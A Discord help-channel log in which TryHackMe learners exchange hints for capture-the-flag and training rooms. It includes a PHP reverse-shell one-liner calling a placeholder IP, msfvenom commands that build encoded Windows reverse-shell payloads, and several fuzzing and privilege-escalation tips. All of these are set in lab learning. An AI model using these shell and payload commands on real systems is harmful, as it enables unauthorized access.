#room-hints
Best not to ask about it here then
Because not only can we not help you, but usually those are meant to be completed individually
hello
i am doing a room Hashing - Crypto 101
i am on task 3 question 2 i tried the hash in several website though i was not able to crack it some web site said the charset is not valid can i get a hint
not sure if it would help but did you try the !crack bot command for it?
nope it was mentioned to use online tools
there
that is online I would say
bot commands here, but you could also try hashes.com perhaps
not really sure how to give a hint about o.o
maybe open the first 10 links google gives you searching for hash cracking and put it into each ;D
lol i did it thanks
Gave +1 Rep to @silver otter
hello guys, i would like somebody to guide me
i am doing Rick`s CTF challenge
i found some information but, i'm stuck
@hollow spindle Just type your question. What do you want to ask, where are you stuck at? Share some screenshots for better clarification.
I found a Username, an /assets directory, open ports 22/80, and a sha256 code which i decoded with base64 and found a word "smow" (dont even know if its useful)
used the burp tool but couldnt find anything useful
Make sure to ||view source code|| of every webpage
Also might try|| gobuster!||
I'm working on "Upload Vulnerabilities" task 11, file upload vulnerabilities.
I figured out how to bypass all of the client-side validation, but in order to do so, ||I had to prepend the node reverse shell script with ÿØÿ||. When I am able to access that, the response says that it could not be displayed because there are errors and I also don't ||get a connection with my nc listener||. Does anyone know if I'm missing something here?
nvm I think I figured it out 🙂
A very useful option that should not be ignored:
How would you tell nmap to scan all ports?
Im stuck with that question
-p- solved
nice one 😄
stuck in https://tryhackme.com/room/somesint task 4 question 1
I'm kind of confused
Hey, I am currently in the OWASP top 10 room at task 29, regarding the CSE Bookstore
So I used searchsploit and found three exploits
I could also login as admin using the Authentication bypass
but the question asks about characters in /etc/passwd
Now I am a bit stuck.. How would I be able to get there?
Maybe over a cross site scripting reverse shell using the first exploit listed when one searches for "cse bookstore"?
--script=vuln
need hints for the ISO27001 room stuck at task3 question 1 what should i be researching for CETS No 185 could be a example of what? also stuck on task 5 question 2 What is the name of the "Operations security" i talking about an. any clear suggestions would be greatly appreciated
for task 3 q 1, look at the areas discussed in the topic and combine with a little Googling you should be able to find it
for task 5 q 2 look at the 3 types and see how it best fits
Need help with OSQUERY room: One of the users performed a 'Binary Padding' attack. What was the target file in the attack?
3 types of what though?
parts of the table
thanks
Gave +1 Rep to @glacial gust
np
Best to ask your question directly, then people can respond if they can answer
I need help with "Relevant" room
That's not exactly directly.
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
Hey guys. Could I have an hint on Coctus stories? I'm at the C.A.T. page
Year of the fox: Got the rascal's credentials and logged into the site, but couldn't find a way to get lfi or the webflag... any hints?
I did try to de-obfuscate js, but that didn't reveal much other than || a search.php with a post request in json format using the key 'target' ||
am I missing something?
Ok so I don't know how?? But when I typed in burp (out of frustration) "What to look for?" It returned 3 files?? Can anybody explain me this?
Any hints... On how to access those files?
Try a few different payloads and observe the behavior.
I tried many || php reverse shell || but none of them worked
Try some normal ||reverse shell payloads|| and see if anything works.
Anyone managed to input the serv2 flag on Hacker101?
@sudden shoal Run the VPN directly in Kali, not on the host OS.
ill delete my qs. in general sorry about that
Guys i dont see payload encoding option
from task 9 of burp suite please do let me know
What does the task says to do?
it says to uncheck the url encoding from payload encoding options
but the payload encoding options isn't available
@bold lichen
Go to Intruder -> Payloads, then at the very bottom you will find the option.
Hello everyone! I'm fairly new here and was hoping for some help on Network Services - Task 4. Maybe I've been on this too long and can't think of it, but how do I find the username of the account?
thanks weird wasnt able to check it in the attack box
Gave +1 Rep to @halcyon sequoia
Heya, there's a file which contains the username.
Please tell which question and what part are you stuck on?
Screenshots helps a lot!
Sorry about that! It's this part here at the end where it states using the info you've gathered to find the username.
Man I guess I really did just miss something smaller... I'll take another look. Thank you!
Gave +1 Rep to @tight fulcrum
Cool!
You found an interesting txt file on smb. Hint: ssh username is 6 chars long
I am trying a burpsuite intruder attack on Juice Shop to bruteforce the admins password. It takes forever though, it seems wrong. Is it supposed to take ages?
Only in the Community Version...
Okay so its supposed to be like that? Was thinking maybe i got something wrong
allright I'll just wait and see
In the Juice Shop it should be possible to finish in this life 😉
thats nice encouragement!
De nada. I do what I can..
Hello everyone
I want to ask that can we use linpeas or winpeas in oscp exam
#general would have been better but yes they are able to be used in the exam
how can I enumerate subdomains in nahamstore? I tried gobuster vhost, but it returns 200 for every subdomain in wordlist
That's the right root word
Not SUPER familiar with gobuster, but you can try fuzzing with ffuf and filtering by response size or word count…just to see if anything comes back.
you can use ffuf
something like this
ffuf -w subdomains.txt -u http://website.com/ -H "Host: FUZZ.website.com"
doing this you will get a lot of false results and then you need to filter it with -fw
ffuf -w subdomains.txt -u http://website.com/ -H "Host: FUZZ.website.com" -fw 349
It's a word, based on the one you've already got that describes a protective layer, usually in a cable. Or another way of looking at it is think of that object as a verb rather than a thing.
Have a look at the Setup task, you need to complete your subdomain enumeration against the nahamstore.com domain.
you pretty much have it
Of course filtering by response size, idk why i havent thought of that thanks!
Gave +1 Rep to @short fox
thank you
np
it's really silly once you get it
Yup. A lot of people, myself included have spent time puzzling on that! Do you know if anyone has actually found that word being used to describe that thing outside this question?
yes
but it's obvious to a native english speaker
a bit less so to non-native speakers
it's an object that verbs
.<
same concept really
Can anyone give me hint on recon nahamstore
Hello I'm looking for a hint for Osquery room, Task 9, Question 2: "There is another security agent on the Windows Endpoint. What is the name of this agent?"
I've tried loads of different queries to different tables like win_services, win_event_log_data, osquery_registry, etc but cant for the life of me figure out what the answer is.
Keep plugging at those tables. Maybe something more program-like?
Hi all, I'm not sure if I'm overlooking the obvious or if it's just been a bit too long since I did the other rooms required to complete it, but I can't seem to find where to start in Investigating Windows 3. I've done the quick run throughs of event viewer, registry keys, even ran a quick scan, but just can't seem to find where to start. Can I get a hint on where to go first?
room - yara
task10
1st que
What have you tried so far?
I want to ask, I learned linux fundamentals first part. in task 9 why is there a shiba2 password even though I only created a nootnoot.txt file
The binary is a program that checks that you created the text file
If you created the text file, it gives you the password when you run the binary
does it apply to all linux or only the os on the web?
Just the machine for this room
Hello all! I'm currently doing the Network Services room and I have successfully used mget to snag the id_rsa and id_rsa.pub files to the default/home directory in the AttackBox Machine but have been struggling to successfully move them into the /.ssh directory. I suspect I'm messing up the syntax on the "mv" command but I can't seem to figure out what I'm doing, any thoughts?
doing incorrectly*
hmm okay, I'll see what I can do with this new information, thanks!
Hi all, anybody willing to give a nudge on the room "CmesS", did extensive enum, identified 2 possible exploits. Can't get them to work.
Apparently not
what 2 exploits did you try
'query' SQL Injection
Remote Code Execution (Unauthenticated)
Not sure if I can put spoilers here 😛 ?
You can use spoiler tags in discord.
We'd prefer it if you didn't spoil things for no reason, but obviously if you're asking for a hint then you have to be able to tell us what you've tried/found etc
Hey all.
I've a question regarding Alfred room. I'm trying to get a meterpreter shell for the room. but it is stuck here. Meterpreter session 1 opened (10.x.x.x:44 -> 10.10.46.188:49258) at 2021-05-11 23:59:31 +0530
nevermind. I got the shell.
Thanks y'all.
alright, well if you searchsploit the service there's only two exploits that make sense, and they are both based on a certain query language.
I tried both manual and changing those exploits but can't get them to work.
Hi guys? Room Steel Mountain: from msfconsole getting this:
Any ideas?
Also IDK why you redacted that
Damn. Missed it. Thanks
Gave +1 Rep to @astral smelt
In Room HTTP in detail in Making Requests task. First flag which required Make a GET request to /room. In response when send a GET request to /room shows incorrect flag which wasn't accepted. There are missing 'E chars. (sorry for language wrongs)
It should be fixed now
🤙
Its written in the website itself still it says the answer is wrong
Room:MITRE
Task 7
could you send the URL you were looking at? the answer is on this page https://attack.mitre.org/techniques/T1078/004/
👍
currently struggling with osquery task 8 😦
i read your hint but still having trouble. can you give a more narrow hint?
What have you tried so far?
@gusty turtle yara 1ndex.php files/file2.yar
What type of material can be used to go over the door to grab the secure side handles when an under the door tool is not able to be used?
can someone help me with this
It is used in old cameras. TheNotSoCivilEngr has a video related to that.
Thank you so much!
Are you sure that file path exists?
There's a table for programs that's worth looking at. Also worth checking out the THM Intro to ISAC box if you're having trouble recognising which one it is
still having trouble...i thought it might have been services but no luck. still looking through the tables though
Just to be clear, you don't need the plugin for this bit. The table is listed in the schema you used in part 4. If you're looking at services, you're too far down.
we are referring to windows security endpoint. i'm on the osquery schema list now. should i be choosing version 4.8.0?
thnx
Just follow the link in part 4. 4.7.0 is fine though I doubt it makes a huge difference. I've already mentioned the name of the table. Begins with 'p' and ends with 'rograms'.
Hi guys. Steel Mountain room. Getting this:
C:\Program Files (x86)\IObit>sc start AdvancedSystemCareService9
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.10.63.157
sc start AdvancedSystemCareService9
[-] Command shell session 2 is not valid and will be closed
[*] 10.10.63.157 - Command shell session 2 closed.
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
Any ideas?
Is it something with x86 payload/exploit ?
Tried this
msfvenom -p windows/shell_reverse_tcp LHOST=10.9.5.185 LPORT=4443 - e x86/shikata_ga_nai -f exe -o Advanced.exe
try -f exe-service
Basically windows expects services to tell Windows that they started up properly otherwise it kills them.
-f exe-service generates a binary that tells windows it started up properly
nvmd solved it another way. Thanks
hi guys how can i get the windows privesc badge?
i have completed the windows privesc room but it doesn't give me the badge
You need to complete this one https://tryhackme.com/room/windowsprivescarena
thank you so much!
Got it. I was looking at programs but what was throwing me off is the answer format for the security agent question is a 10 letter word and a 5 letter word. I may have skipped over it because i was so focused on finding a name that matched the answer format
Hey guys, Im new here
One question
I have no knowledge of this. Can I learn from the site?
read #start-here
there is a link to free path for beginners. You should read that
Happens. Glad you got there!
ended up getting it! Thanks for all the tips! 🙂
Gave +1 Rep to @candid nimbus
Hi guys,
I'm in Alfred room and trying to create msfvenom payload.
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=<IP> LPORT=<port> -f exe -o reverseshellAlfred.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai chosen with final size 381
Payload size: 381 bytes
Final size of exe file: 73802 bytes
Error: Input/output error @ io_write - reverseshellAlfred.exe
Do you know what this error mean?
Ok I created payload in mounted drive. When creating on local disk everything is fine.
Hi I'm in the Network services room, task 4. I have the id_rsa file and tried ssh -i id_rsa johncactus@IP but it just says Connection closed by IP port 22. Any hint of what I'm doing incorrectly would be appreciated.
That's the wrong username
SSH will close the connection like that immediately if you have a valid key but a wrong username, usually.
Ah thanks
Hi all, I'm in Investigating Windows 3.x. Can someone give me a hint for "This is the default communication profile the agent used to connect to the attack machine. What attack framework was used? What is the name of the variable?"
I read the forum post hints, but am still stuck. I have attack framework and I think I know variable but I'm not getting the correct answer
Edit I got the answer, it doesn't match at all with character length. Thanks!
I am doing dogcat room and i have got root and got the 3rd flag which was in root directory
There is also a 4th flag but i have no hint for it
I tried finding it using find command but couldn't find it
dogcat is hard
How can I find the CIDR range of IP address having "172.16.x.x" and a Netmask of "255.255.0.0"?
I read a bit about Netmask and I understand the usage for it but not how to calculate it...
The CIDR notation is network ip/prefix size
The prefix size tells you how many bits belong to the Network part rather than the host part
So like, 192.168.0.0/24 would be 192.168.0.x with a netmask of 255.255.255.0
How do I get that by my self?
https://www.digitalocean.com/community/tutorials/understanding-ip-addresses-subnets-and-cidr-notation-for-networking this might help?
I'll try to read that for a sec.
I understood the concept of dividing networks, but I still didn't get how to calculate it by myself, I found a calculator for it online which satisfies it for now... but I still want to understand it... if any of you can, it would be great if you can explain...
Ok, so an IP address can be split into two parts
There's the host part and the network part. Not in that order, annoyingly
The network part is the same for all hosts on the network, the host part is what changes
For slash notation, the number tells you the number of bits for the network part.
The subnet mask is a 1 for each bit that belongs to the network part rather than the host part. It helps you write the addresses out in binary here.
The way I learned it/like to think of it: each octet is 8 bits/1 byte. So the entire address is 32 bits/4 bytes. The number after the / is how many bits are "reserved" for the network, starting from left to right. Anything to the right of that is allowed to change.
So a 192.168.0.0/24 means those first 24 bits (first three octets) must remain the same. The last 8 bits can change. And then the number of available addresses is 2^(32-n), where n is the number after the /
so a x.x.x.x/32 defines a single address: 2^(32-32) = 2^0 = 1
while a x.x.x.x/16 is 65536: 2^(32-16) = 2^16
If you're comfortable with binary, sometimes it makes more sense to look at it from that perspective. But it's also fairly simple to just calculate the number of addresses, and then your range is the first address specified, plus that number. Although I think there's a little bit of strangeness there I don't quite understand when it doesn't match on a nice/neat boundary.
(that's when the address specified isn't the "starting" address, and is within the actual block)
@stuck fractal doesn't the CIDR notation represent the usable IP Addresses of a certain Network?
Indirectly yes
Is there anyone who has completed the Mitre room? A hint for the following questions will be much appreciated:
Task 6 ATT&CK® Emulation Plans
Examining APT29, what 2 tools were used to execute the first scenario?
What tool was used to execute the second scenario?
Where can you find step-by-step instructions to execute both scenarios? Task 7 ATT&CK® and Threat Intelligence Per the detection tip, what should you be detecting?
What platforms does this affect? All my answers seem to be wrong.
Hi guys, I'm stuck on Burp Suite - Sequencer Let Sequencer run and collect ~10,000 requests. Once it hits roughly that amount hit 'Pause' and then 'Analyze now': I've paused it but for some reason the analyze now button is still grey, not clickable. Any advice?
hello everyone, i'm stuck on PrivEsc room task 4. It says that i have to edit the hashes of root user with my own created hashes (which i managed to create). However, i have no idea how to replace the hashes of the root with my new hashes. Does vi work? In need of some advice
Heya if you're still stuck: you can use any editor you like for example vim/nano
@tight fulcrum thanks for the suggestion. figured i missed the full stop at the end of the hashes which was causing it to not work. Thanks for the help again 🙂
Gave +1 Rep to @tight fulcrum
What do you mean by "where the hash is"?
The hash is in /home/kali/Desktop/hash1.txt
the cracked value of hash
It was printed to the console, but you can also use --show
when i use --show it throws command not found
--show is not a command in itself
you would use john hashfile --show
Replacing hashfile as appropriate.
i am not understanding sorry
run john <your hash file > --show that's what he's saying
Without the angle brackets
see @stuck fractal and @tight fulcrum
Remove all the other flags.
You will notice that the commands we said didn't have any of those other flags
Why are you trying to crack it again, in the screenshot you sent, it showed the password.
They are not
They're trying to retrieve the hash from the pot file
where did it show the password
Look under where it tells you it can abort the connection
sorry
thanks
Gave +1 Rep to @thorn heart
thanks
thanks
Can someone help me? I'm doing the room about nmap.
I need to perform an Xmas scan on the first 999 ports of the target, and say how many are open or filtered. I wanted to do
sudo nmap -Pn -sX -p 1-999 <ip-address>
but for some reason I still get the answer 0... when it's supposed to be 999, and I don't get why
It's fine for me to send a screenshot containing the IP address of the machine?
okay now it doesn't give me the answer quickly it just "hangs" (probably still in the process), but in the answer that I ended up opening thinking I was a dumb dumb it took 0.01s, and in mine i'm waiting for a few minutes now
if i remember correctly they should all be filtered???
Working on the OWASP Top 10 module and I'm stuck on task 7. >_>
I keep getting the main page when I try registering the " darren" username
Don't include the quotes @vivid crow
I've tried both ways. First time without.
Never mind, I figured out where my hang up was.
Any hint on how to get a foothold in VulnNet: Roasted?
hello i am doing skynet and i have found the ||smb password in the email|| but its not letting me into the ||share|| for some reason (i am making very sure i enter every character correctly since the string is weird)
ive tried using tools like medusa to bruteforce it with a wordlist of 1 on both user and password
just to make sure im not typing it incorrectly
and it says unknown error when i do it
nvm i figured it out please ignore
I got access to certain SMB shares through smbclient, but not sure what to do after that
what should i do on "Task 1 Starting your machine"?
@rigid leaf the box wants you to upgrade it to a meterpreter shell
it has some stuff you need for the next questions
but iirc you should already be in one since its attached to the eternalblue exploit
It's the default. It's not attached.
The exploit is used to deliver a payload. You can change what payload is delivered.
right
There's no inherent connection between eternalblue and a meterpreter aside from meterpreter being the default payload here.
Hey peeps, I am not able to figure out what type of encoding this is -> MJQXGZJTGIQGS4ZAON2XAZLSEBRW63LNN5XCA2LOEBBVIRRHOM======
It's not base 64
it's part of the room -> c4ptur3-th3-fl4g
I have solved rest all questions, but this one's irritating me.
Can anyone help?
yep i know, but I don't even know what exactly should I google
ok, i'll search for that.
I recommend using cyberchef
The Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis
it was base 32, thank for sharing this 🙂
I just rooted the box. There are 2 ways on how to get the right 'user'. I had to do it the hard way because I didn't know about the other way before. LOL. Basically, I created a list, based on the clues in the readable shares.
Did you use impacket?
Yes. But first, I used the list I created for enumeration. I used another tool. Related to the name of the box 'Roasted'
Hey, I'm working on OWASP Top 10, on task 11. I'm supposed to find a db file in /assets but there are just two scripts. Is there a different spot I'm supposed to look or am I just missing something?
I used kerbrute first.
Link the room please. I did this a while back, I don't remember it well
👍 thanks a bunch man
Gave +1 Rep to @pallid trellis
I'll try it tomorrow
Read the link below and verify with the bot, then post a screenshot of the directory and its contents
!docs verify
Hi, i'm working on OWASP Top 10's first box, and I cannot execute a php reverse shell for some reason, am I doing something wrong?
Yes, it is
the reverse shell i'm trying to use is this: php -r '$sock=fsockopen("MYPrivateIP",9001);exec("/bin/bash <&3 >&3 2>&3");
Just so I'm understanding, creating a revshell here is not part of this task, right? You're doing extra?
Yes, i'm trying to get root
that might not even be possible for that box, I don't know.
oh, that could be why
General revshell debugging: make sure the ip is your tun0 IP, that you have a listener running on the correct port, that you're connected to the vpn, and that it's running in the kali vm and not the host OS, if you're using a vm.
For the specific shell command you wrote above, it's possible there's a problem there calling "php ..." within a php file. I don't know enough about php or the structure of those shells to know for sure
I'd also try simpler rev shells first
What does 3 stand for? I only know 0,1,2. Stdin,stdout, stderr
The 3 makes a file descriptor and 2 redirects to it
looks more like 2 is being redirected to 3
Again, simpler rev shells first
Ohhh. Nice.
Hey, I'm still stuck on this problem. Am I missing something obvious?
I'm sorry, I thought that screenshot was associated with what gellert asked. Clearly running on too little sleep
Okay, so I think the issue you're having, WillSloan, is that you need to go to http://site.com/assets/ in the web browser
the screenshot you posted doesn't tell me what page you're actually on
Ah yep, thanks
did that solve the issue?
Yes it did. Didn't realize you could just browse to the folder.
sometimes you can, sometimes not. Depends
in this case, the web server was (mis)configured to allow that
(Directory listing is often enabled by default)
Hello everyone 🙂
need help in wireshark room... the ip i found does not match the answer format..
Am i wrong ? Thx 🙂
thx 😉
yea idk how to answer this
there is no specific date other than 2020 on there
wait really wtf
wtf is that extra character in the end there for
x.x
I call bull on that
I would google or wikipedia that
Must be answer tolerance if it accepted 4. Answer should be 4.2
Network File System (NFS) is a distributed file system protocol originally developed by Sun Microsystems (Sun) in 1984, allowing a user on a client computer to access files over a computer network much like local storage is accessed. NFS, like many other protocols, builds on the Open Network Computing Remote Procedure Call (ONC RPC) system. NFS...
Hello. I need some instruction. I searched on youtube and watched a lot of videos on the topic but didn't understand how to solve the task: https://tryhackme.com/room/owasptop10 Task 16 Q: Where is falcon's SSH key located? I copied the answer so that i can complete the task. But what happened here? How can i find where falcon's SSH key is located using xxe? i used command "locate .ssh" instead of using file name but nothing happened. I am a newbie. Pls help me, what payload do i need to find the .ssh file? I am a n00b
locate .ssh probably wouldn't work, for two reasons: locate might not be installed, and .ssh is a directory
try locate id_rsa maybe
but also- think about it this way:
- We know the user's name (falcon)
- We know all users on linux systems tend to have a similar directory structure
- We know that ssh keys are typically stored in certain directories (...../.ssh/)
Combine those pieces of information to guide your search/guessing
Thanks dude
Gave +1 Rep to @worn otter
Hi guys i got stuck in nmap task 12 second Question
so what should i do?
link the room please. I haven't done that one in a long time
How can i do this?
just paste the url of the room here so I can find it easier 🙂
Paste the link to the room here
ok
this the link please help
i dont understand what a question is asking?
which question?
read through this script what does it depends on?
post a screenshot of the script
no, post a screenshot of the contents of the script
I think you are misunderstanding me
open the script in your favorite text editor, and read it
sublime (subl) is a nice text editor but is not installed on kali by default
nano should be
if not, cat would work, but it might be a long file. you could use "more" or "less"
sure
any text editor
ok
the file should be something like /usr/share/nmap/scripts/smb-os-discovery.nse
ok
hey I got the ans thanks @worn otter for helping me i am searching since last two days. thanks again
Gave +1 Rep to @worn otter
you're welcome 🙂
Hi #room-hints,
Does anyone understand the OWASP Juice Shop - Download a Backup File!
I've downloaded the .md file using the null terminator, though it's expecting an answer?!?
plus how do I post a screenshot?!?!
Thanks @tight fulcrum, I'm verified 👍
Gave +1 Rep to @tight fulcrum
Hi #room-hints I've downloaded the package.json.back using the following command and I see a JSON object file, though there's no THM flag. Furthermore, there's no question to support answer
Guidance anyone?
can u try without logging in or with logging in
"If you want to exploit a 2020 buffer overflow in the sudo program, which CVE would you use?"
I've scooped the Exploit Database. Couldn't find
Google: "2020 sudo buffer overflow"
You can't give up after the first place you look
should quite literally be the first one anyway ;)
You need to keep looking and keep trying new searches
Yelp again
In Linux fundamentals part 2
Putty and SSH
I already have Linux as my Main OS
So you can use the command line SSH client
Do I need to install Putty on my PC?
No
I did say.
From where? My actual machine or from the AttackBox?
Either as long as your own machine is connected to the VPN
Can I get a nudge on PE for Relevant Room?
look at the output of getprivs
gotcha cheers
evilshell
/etc/passwd doesnt work this command
why
it asks "How many non-root/non-service/non-daemon users are there?"
/etc/passwd is not a command
Count
that list of .. huge list
Yeah, except only a few are not service accounts AND not daemons AND not root
bro did u count too?
Not your bro.
And yes, I counted. Because counting to a number less than 10 is easy enough.
ls home ?
will it shows root user too?
nope
Why don't you try it and see anyway?
ok
Hi @cold oracle thank you for the reply. Yep, being logged out, then making a separate call via CURL showed the flag
Gave +1 Rep to @cold oracle
wlcm
+rep <user>
@normal ermine
Gave +1 Rep to @normal ermine
The bot only lets you thank one person every 5-10 mins or so, to prevent abuse. What'd I do to deserve that 🙂
Gave +1 Rep to @normal ermine
What is the user's shell set as? what does this mean
there is a file which shows what each user's shell is set to
you need to figure out what that file is, and look inside it
file where in my user account folder?
google can help you find the name of that file 🙂
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
what does this mean?
www-data is my user id..right
No
i mean www-data is my logged in user ...right
cause i use command whoami
it shows www-data
Hi guys i started vulnversity room with nmap challenge and i have scanned my attackbox with nmap but it doesn't show any squid proxy and webserver
Should i scan some other ip? Or am I missing something? I browse some info about it in google and it should display the information in first nmap scanning with -sV flag which I tried, so my guess is I am just scanning wrong ip.
Yeah, you need to scan the target machine
Okay, yes now it is clear. Thank you.
it's a wildcard, can mean anything/everything
I performed a TCP SYN scan on the first 5000 ports of the target (10.10.75.164)-- there are no ports shown as open. The syntax I used was:
nmap -p 1-5000 -T4 -A -v -Pn 10.10.75.164
I'm far from an nmap expert, but try -sC -sV. Double check to see if the -A overrides that.
I'll try that thanks
you're welcome
nmap -sC <target> worked
great 🙂
Some rooms can take a while to boot up all the services, also. Some as much as 5-10 mins
that is probably what happened
hii
i found the secret dir on the ccpentest room
but idk which extensions to use
how do you choose?
I'm not sure if I've done that room, so I'd need more info
link it. Which task? What have you tried?
last task,number 24
i nmaped the room
found 2 services
apache web server and ssh
i checked the webserver
it was a default server
i gobusted the ip and found a /secret directory
the hint says you should use extensions on the secret directory
but idk which extensions to use
try gobuster with a -x txt
you made notes??
It might have been my first guess, there might have been something there that was a hint
I always make notes
sometimes they don't mean much when I come back to them, but I try to always make notes on rooms I do 🙂
yo epic
i found a secret.txt
looks to be some kind of hash
let me go crack that brb
Can I get a nudge on PE for host Relevant? atm, I'm trying to escalate via SeImpersonatePrivilege, but JuicyPotato won't allow me to run and the binary gets deleted afterwards.. Something to do with AV probably? I would appreciate a nudge
Wish I could help, but I haven't done relevant, so I'd only be guessing.
No worries, mate. 🙂
okayyy
i got into the system
i think i got to get into root
whats a good priv esc technique?
you ssh'd in with ||n|| ?
there is a lot,do i just pick any
yeah
i cracked the hash
and it looked like a typical ssh creds
try ||sudo -l||
but you can also look around as your current user. I think there's a user flag there
i got the user flag
ah ok
super easy
you don't need to do that
what was the output of the command I hinted at a minute ago?
what does that tell you?
you dont need a password to super user to root?
and su without an arg will infer root
yeah this is just the basics
maybe it should be less of a test rather more of a way to commit all this knowledge to memory
thank you so much bro i appreciate it
you're welcome
and yeah, I strongly encourage you to take notes as you go
all of this stuff comes up over and over again, so having a quick way to search that will be invaluable
can i see a sample of your notes please?
just to get an idea
I don't have them on this machine
oh i see
but basically, for THM rooms, I break it down by tasks, same as the rooms are, with big headers
like a walkthrough?
and then in each section, I paste in every command I run, and things I learn, my thoughts, outputs of commands, etc
every command I run that gets me somewhere, yes
sometimes not 100% of them. Like for example, I spent 20 mins looking through directories earlier, didn't find anything interesting
so rather than paste 50 cd and ls and their outputs, I just wrote a note about it
cherrytree
ohhh nicee
and then I also have separate folders/sections for things like privesc attacks, revshells, stabilizing shells, etc
eyyy thats cool
+rep @worn otter
Gave +1 Rep to @worn otter
Hey everyone, I have a question that if i am running a nmap scan in my VM that it says that <Host seems down. If it is really up, but blocking our ping probes, try -Pn>
if i run it in tryhackme attack box it runs successfully
so what to do because i am not a subscribed so i run attackbox only 1 hour per day
so can i do this through openvpn
if not then what to do?
you can connect to the vpn and do the same thing
you can use -Pn in the nmap command,
Been working on the Daily Bugle room for too long. I must be missing something obvious.
I've looked over several walkthroughs and can't seem to get sqlmap or the joomblah.py python script to dump the password hashes. Also, pet peeve - Task 1's answer is a different syntax to the answer in the web server.
This is what I get when I run joomblah.py
There's a fix for it pinned in #room-help I believe
I have John working on the password file for over an hour... Am I missing something ?
Room, task, question?
Agent-sudo
Any hints how to get the information from the photo? google dork and exiftool gave me nothing 
which photo? there were lots lol
the first ones from ftp, "fake aliens"
||binwalk|| use the ||-e flag to extract||
Gave +1 Rep to @unborn canopy
Hey i am stuck somewhere can u help
Oh shit i can't send pic
import socket

class NetCat:
    def __init__(self, args, buffer=None):
        # args: options object (must have a .listen attribute); buffer: optional data
        self.args = args
        self.buffer = buffer
        self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

    def run(self):
        # listen() and send() are not shown in the posted excerpt
        if self.args.listen:
            self.listen()
        else:
            self.send()
Why we use args in this
What is the use of args
Your one help is equal to 1 bitcoin
args is used to determine if we want NetCat to listen (client) or send (remote)
any hints for room glitch im stuck on user.txt
Is this for a tryhackme room?
xpost from #room-help
#room-help message
Don't do this.
xposting?
Yeah. Ask in the appropriate channel and wait for a response. Don't ask the same thing over several channels.
i only asked it here and in #room-help friend 😄 .
mostly because i wasn't sure where to ask this.
Ok, but please listen to me. Don't do that. It's spammy.
sorry about that, could you please tell me where should i ask then?
If you want a hint, then #room-hints
That includes sanity checks and nudges in the correct direction
If you want more than that, #room-help
#room-hints seems like the perfect place to ask my question then!
Yes. The issue is the fact you asked it across multiple channels.
well i did tell you why i did that 🙂
Yes. And I am telling you not to do that, and you're arguing.
Just listen to what I'm saying because next time it will be more than just "please don't do this".
there seems to be a horrible misunderstanding, i'm not arguing with you, i'm simply sharing my side of the story with you friend
I didn't ask for your side.
I just asked you not to do it.
You can simply apologise and not do it again. That's all that needs to happen.
I am doing the inferno room and i got a rce exploit for it and u get my reverse shell back but it immediately exits itself with exit command, meaning its configured such way
Any hints to move further?
Top right terminal is where i get the shell and it automatically exits
@full panther That room is not public.
Having a bad day or something? you seem a little aggressive lol
First of all, not really your place to comment. Secondly, it was because I had to repeat myself a number of times.
right now i am solving Task 26 [Severity 8] Insecure Deserialization - Code Execution
I know python very well
But here why use command = "abcdxyz..........."
No.
Are there any hacking courses or some kind of a tutorial for beginners
Yes, check out #start-here
Dope
Yo ninja, https://blog.tryhackme.com/free_path/ this link has all the tutorials in it for beginners right?
Got it from #start-here
That's one resource yeah
So we can learn from this or is the premium one better
It's a good start.You might wanna subscribe to get more content
Best to try the free content first
If you get on with it, you can pay and get more content
OK, thx guys. Gonna go start tutorials now
Happy hacking
Hi, I'm doing https://tryhackme.com/room/commonlinuxprivesc and at task 4 answering the second last question. I've tried /etc/passwd and /etc/shadow. The box says Uh oh! undefined so not sure if the answers are incorrect. Is one of these correct or is there some other place I should be looking?
That's your antivirus
BitDefender?
Hi, I'm doing https://tryhackme.com/room/linuxprivesc# and at task 15. I got the root bash. When I run whoami, it shows root but my uid and gid is still showing 1000 (user) and using sudo -l, it is still saying that I can only run the same commands as User user without password. So does this mean it is not a true root bash?
And also may I ask how do I post screenshots along with my questions?
!docs verify
yes it does show your uid and gid as user but you can then use some other techniques to become "real" root
like this :
which is given in the other tasks
Ahhh, I see. Thank you very much for the explanation.
Gave +1 Rep to @slender dawn
yeah this was just one of the methods you can do
also you should verify so that you can send screenshots
I'm so sorry. Still a little unsure about this. So basically I just put the "!docs verify" and then ctrl v whatever screenshot I have?
You have to follow the steps in the link
Ohhh, okay.
Thanks alot!
Thanks again!
np
Good evening everyone. I am unfortunately failing the last question from the quiz of https://tryhackme.com/room/bpsplunk. What is the website where you can find the Splunk forums at? I have not found any forums, but only the community pages, but none of the links here is the correct solution. Please send h3lp ..
splunk changed the setup recently, but just think of the subdomain as somewhere to get "answers" for your question
Hello I'm doing OWASP Juice Shop room and I can not answer or understand what the question is for Task5 Question 3 - Download the backup file. I have downloaded the file from the FTP server and I have got the MD5 hash of the file and that's not right for the answer I have also looked in the file and I can not see a flag in there as well. I guess my issue is more whats the question ?
Please don't ask the same question over multiple channels
please forget this question, the web site has now given me the guild, after deleting my cookies
Does anybody know if there is a PS command to find the number of logs for an event. Right now I'm trying: PS C:\Users\THM-Analyst> Get-WinEvent -Path C:\Users\THM-Analyst\Desktop\Scenarios\Practice\Filtering.evtx. But it just prints out all events which i don't want; all i want is the "count or number of events" is there another command i can add to filter just this? or am i going about this completely the wrong way?
try adding | measure to the end of your command
That worked! Thank you so much, I was going crazy looking for that.
Gave +1 Rep to @pure thistle
should run if you change -d to -domain and -users userlist.txt
Hello Guys
I'm stuck in the room zthweb2
Section3 API Bypassing Challenge. I've used big.txt without any results 😢
somebody can help me plz ?
Hi, I'm doing https://tryhackme.com/room/steelmountain# task 4. When trying to set up the web server on port 80, I get an error saying that the address is already in use.
a program is already using port 80, kill it
